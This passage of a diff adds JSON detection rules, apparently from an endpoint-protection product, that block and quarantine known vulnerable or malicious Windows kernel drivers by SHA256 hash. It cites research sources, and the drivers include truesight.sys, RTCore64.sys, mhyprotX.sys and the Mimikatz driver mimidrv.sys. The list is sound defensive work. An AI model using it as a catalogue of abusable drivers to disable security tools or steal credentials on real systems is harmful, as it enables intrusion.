"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827053Z", + "creation_date": "2026-03-23T11:45:30.827055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827060Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ab90e068d05da1a25d846ce1556bf26f62df1afb62ee65096c74009a0abc4db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c44cb6de-e19e-59d5-973c-0243ce2ce4eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823986Z", + "creation_date": "2026-03-23T11:45:30.823988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0b5d5d75115c273df34b4f496d8a1c401b94c850d9fe0bb8d82d9777d141759", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c45bd53d-9c85-5474-824a-95127c748ef5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495566Z", + "creation_date": "2026-03-23T11:45:31.495568Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495574Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61161913cb2ceb5b103e0dbd79de796a09695f43d8f12d15a674ac88b46a3b75", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c460552c-425e-5fc9-a863-3814a04b6d11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148347Z", + "creation_date": 
"2026-03-23T11:45:31.148349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88189a4c2b9102a0e80c127cb8441f4034273c91420075edc666622fdbde9940", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c463bb53-8dd8-516e-a5c3-73911e30bd78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475273Z", + "creation_date": "2026-03-23T11:45:30.475276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3db84cbf299307b1d3500b50355cf35f63d69c6c56d117335fbef7c84ddcc09b", + "comment": "Malicious Kernel Driver (aka e29f6311ae87542b3d693c1f38e4e3ad.sys) [https://www.loldrivers.io/drivers/c00f818c-1c90-4b47-bc29-fb949f6efb65/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c468444b-7cc0-51e9-ac85-e4c6a5b37681", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607883Z", + "creation_date": "2026-03-23T11:45:29.607885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e50b25d94c1771937b2f632e10eea875ac6b19c57da703d52e23ad2b6299f0ae", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c46b4bc4-5dfe-527b-91d4-dffe3553a51b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828494Z", + "creation_date": "2026-03-23T11:45:31.828496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.828502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a1808733154e92fbe1ca580ef6b886a52e1720461b0b537b5bbe601e07ae55b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c47402b7-6b03-5296-b5b3-89472fde6735", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611926Z", + "creation_date": "2026-03-23T11:45:29.611928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad2477632b9b07588cfe0e692f244c05fa4202975c1fe91dd3b90fa911ac6058", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c47e7ef3-4951-5449-b3ee-6713d2678478", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973602Z", + "creation_date": "2026-03-23T11:45:29.973604Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "478d855b648ef4501d3b08b3b10e94076ac67546b0ce86b454324f1bf9a78aa0", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c48d2d05-059f-5645-8640-0bf2c53f499a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469037Z", + "creation_date": "2026-03-23T11:45:30.469041Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
+ "references": [], + "type": "hash", + "value": "6fe18adf87e3330799361d49e811c7a35a497423833ad83573588b7878df286c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4a1860d-0abe-5d07-baa9-0a0cf1e38252", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157839Z", + "creation_date": "2026-03-23T11:45:31.157864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4808b39a5d295c1fb4c10e89f3bfc53f5e049dd1f8933a2e48364036c74214ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4a3ea73-55ee-5f20-bbeb-d0c43f35f065", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814660Z", + "creation_date": "2026-03-23T11:45:31.814663Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814673Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd72ff8039a551994b1af86b9cf29cd33a2e262fe87c365462f54b7e5c1e9857", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4b6a361-f204-528f-b31e-22bd040ac7c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616450Z", + "creation_date": "2026-03-23T11:45:29.616454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2fcc0fec64d5647813b84b9049d430406c4c6a7b9f8b725da21bcae2ff12247", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and 
amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4c03d63-fe09-556c-99b6-ad0889a033f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147024Z", + "creation_date": "2026-03-23T11:45:31.147026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0ac54d01c70483d5093a814ed0d6bb92e0b4535559d05f98bce2a23275f209f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4c4dc37-dcd7-5c10-9016-d008dc180e36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154804Z", + 
"creation_date": "2026-03-23T11:45:31.154806Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3a16a8d1a4656fb6e19d64b01b7c3e31e9b22124c4e284521453550b331ea4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4d594d1-93c3-5b9a-b626-fe2514c9fc80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983543Z", + "creation_date": "2026-03-23T11:45:29.983545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbfc90fa2c5dc57899cc75ccb9dc7b102cb4556509cdfecde75b36f602d7da66", + "comment": "Vulnerable Kernel Driver (aka cpupress.sys) [https://www.loldrivers.io/drivers/c0645f0f-9b97-4fe9-811e-2e45c250c9ef/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c4da3998-0082-5a8e-b401-9c753aeb18ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827031Z", + "creation_date": "2026-03-23T11:45:31.827033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827038Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ddbd168305b26912de8728c44e8196a1c92c3930fd9871161dbffe6573029747", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c4f511fe-667a-5c2f-a6d5-ff87de3fb959", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458809Z", + "creation_date": "2026-03-23T11:45:30.458822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.458831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5173b9240e9bcd0d9b25290bb0aa45d156fd5a0080841515ab44f61e0e6bd894", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c50163d2-aeaf-5c08-999d-d70c7dad9ab6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494437Z", + "creation_date": "2026-03-23T11:45:31.494440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88574aee96270d0d883f9dc11ee5682209640e18f8fea72fa176b9ab6a8f28ba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c5019506-076a-5d49-ad69-e5ce01e386b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829752Z", + "creation_date": "2026-03-23T11:45:30.829754Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71b7b595246923bfbd1adcc9f22988c3793a99a9adc6afe435604074c57c6d3d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c50ae9d1-bac1-5d26-a51a-9dc32138e6b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829289Z", + "creation_date": "2026-03-23T11:45:30.829291Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "fe78f1d6affe100c7726b86096c409d4b6d2ca3ce71ceae43d2aabf174f55ab2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c50b3386-4275-5ced-92c6-e8bf0cbc54d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813400Z", + "creation_date": "2026-03-23T11:45:31.813403Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e420caccc500b07462e1fef97a2fa67ca2d10ec8c6a2f6fd6917dcc988b15dde", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c50b50fd-3709-503d-aa22-d02ff92c3e3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141219Z", + "creation_date": "2026-03-23T11:45:31.141221Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d8509e82d8506f12b9f8cf6916eb58e15d92b0efb2f300bf5188c4ea354f28a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c50fad14-e67b-5d5d-97e5-927940c67342", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146008Z", + "creation_date": "2026-03-23T11:45:32.146011Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d342b077ec4b0fd3ced62d1e91911ac274c708e4ee513f52ec8f2cdd99d851f3", + "comment": "Malicious Kernel Driver (aka 
driver_0a636606.sys) [https://www.loldrivers.io/drivers/82087b26-b649-4ad1-a353-3a225c757ff7/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c511daa9-7ab4-501a-9914-52f5c4f344ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607417Z", + "creation_date": "2026-03-23T11:45:29.607419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 